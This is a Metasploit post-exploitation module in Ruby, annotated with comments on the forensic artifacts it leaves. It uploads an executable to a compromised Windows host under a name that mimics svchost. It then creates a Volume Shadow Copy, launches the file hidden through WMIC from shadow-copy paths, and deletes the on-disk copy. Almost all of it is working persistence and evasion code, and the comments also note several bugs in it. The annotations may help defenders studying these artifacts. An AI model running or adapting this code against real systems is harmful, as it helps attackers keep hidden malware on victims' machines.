- require 'msf/core'
- require 'rex'
- require 'msf/core/post/windows/shadowcopy'
- require 'msf/core/post/windows/priv'
- require 'msf/core/post/common'
# Metasploit post-exploitation module that uploads an executable to the
# target, creates a Volume Shadow Copy, and has WMIC launch the file from the
# shadow-copy device path. Comments below call out each artifact the code
# leaves behind (files, command lines, shadow copies), since those are the
# points a defender can observe.
class Metasploit4 < Msf::Post
  include Msf::Post::Windows::Priv        # provides is_admin? / is_uac_enabled? (used below)
  include Msf::Post::Windows::ShadowCopy  # provides start_vss / create_shadowcopy (used below)
  include Msf::Post::Common

  # Module metadata and datastore options.
  #   VOLUME - passed to create_shadowcopy; defaults to 'C:\'.
  #   PATH   - local path of the file to upload; required, no default.
  def initialize(info={})
    super(update_info(info,
      'Name' => "Windows Manage Create Persistant Payload in Shadow Copy",
      'Description' => %q{
        This module will attempt to create a persistant payload
        in new volume shadow copy.This is based on the VSSOwn
        Script originally posted by Tim Tomes and Mark Baggett.
        Works on win2k3 and later.
      },
      'License' => MSF_LICENSE,
      'Platform' => ['win'],
      'SessionTypes' => ['meterpreter'],
      'Author' => ['MrXors'],
      'References' => [[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]]
    ))
    register_options(
      [
        OptString.new('VOLUME', [ true, 'Volume to make a copy of.', 'C:\\']),
        OptString.new('PATH', [ true, 'Path to exe on local system.'])
      ], self.class)
  end

  # Despite its name this method does the whole job: it uploads +file+ to
  # +trgloc+ on the session host, creates a shadow copy of datastore['VOLUME'],
  # asks WMIC to start the uploaded file from shadow-copy device paths 0..30,
  # and then deletes the on-disk copy from C:\.
  #
  # @param session [Object] meterpreter session; only session.fs and
  #   session.sys are used here
  # @param file [String] local path of the file to upload
  # @param trgloc [String] remote directory; "" means the remote %TEMP%
  # @return [String] remote path the file was uploaded to (fileontrgt), or nil
  #   on the early-return privilege / VSS checks
  # @raise [RuntimeError] when +file+ does not exist locally
  def upload(session,file,trgloc = "")
    if not ::File.exists?(file)
      raise "File to Upload does not exists!"
    else
      if trgloc == ""
        # Remote %TEMP% resolved through the session, not the local one.
        location = session.fs.file.expand_path("%TEMP%")
      else
        location = trgloc
      end
      begin
        # Extension including the leading dot; rindex is nil when +file+ has
        # no ".", and what the range does then depends on the Ruby version.
        ext = file[file.rindex(".") .. -1]
        if ext and ext.downcase == ".exe"
          # Artifact: +location+\svhost<0-99>.exe — a lookalike of the
          # legitimate svchost.exe name; worth a filename-based detection.
          file_name = "svhost#{rand(100)}.exe"
          fileontrgt = "#{location}\\#{file_name}"
        else
          # Non-.exe uploads are named TMP<0-99><ext>; note file_name is
          # never assigned on this branch, so it stays nil below.
          fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
        end
        print_status("\tUploading #{file}....")
        session.fs.file.upload_file("#{fileontrgt}","#{file}")
        print_status("\t#{file} uploaded!")
        print_status("\tUploaded as #{fileontrgt}")
      rescue ::Exception => e
        # Catches ::Exception (wider than StandardError) purely to log, then
        # re-raises the same object.
        print_status("Error uploading file #{file}: #{e.class} #{e}")
        raise e
      end
    end
    #Create Vss Shadow Copy
    # Both checks come from the Priv mixin; failing either returns nil after
    # the file has already been uploaded (nothing above is undone).
    unless is_admin?
      print_error("This module requires admin privs to run")
      return
    end
    if is_uac_enabled?
      print_error("This module requires UAC to be bypassed first")
      return
    end
    # start_vss comes from the ShadowCopy mixin; presumably it brings up the
    # VSS service — only its truthiness is used here.
    unless start_vss
      return
    end
    # Artifact: a new shadow copy of VOLUME (a vssadmin/WMI-visible event).
    id = create_shadowcopy(datastore['VOLUME'])
    if id
      print_good "Shadow Copy #{id} created!"
    end
    # Artifact: 31 hidden "cmd.exe /c ... wmic.exe process call create" runs,
    # one per HarddiskVolumeShadowCopy0..30 device path, issued regardless of
    # which id create_shadowcopy actually returned. A process-creation log
    # line containing "GLOBALROOT\Device\HarddiskVolumeShadowCopy" is the
    # observable. The returned process objects are never closed.
    digits = 0..30
    digits.each do |digit|
      run_malware = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{digit}\\#{file_name}", nil, {'Hidden' => true})
    end
    # Cleanup deletes C:\<file_name> with a hard-coded C:\ rather than
    # +location+ (the message prints +location+, the command does not); only
    # the on-disk file is removed — this code never deletes the shadow copy,
    # which therefore persists as a forensic artifact.
    print_good("Deleting Maleware #{location}\\#{file_name}!")
    juice = session.sys.process.execute("cmd.exe /c del C:\\#{file_name}", nil, {'Hidden' => true})
    juice.close
    return fileontrgt
  end

  # Module entry point: uploads datastore['PATH'] to C:\ on the target and
  # runs the shadow-copy steps inside #upload.
  def run
    print_status("Uploading Payload to machine.")
    upload(session,"#{datastore['PATH']}","C:\\")
  end
end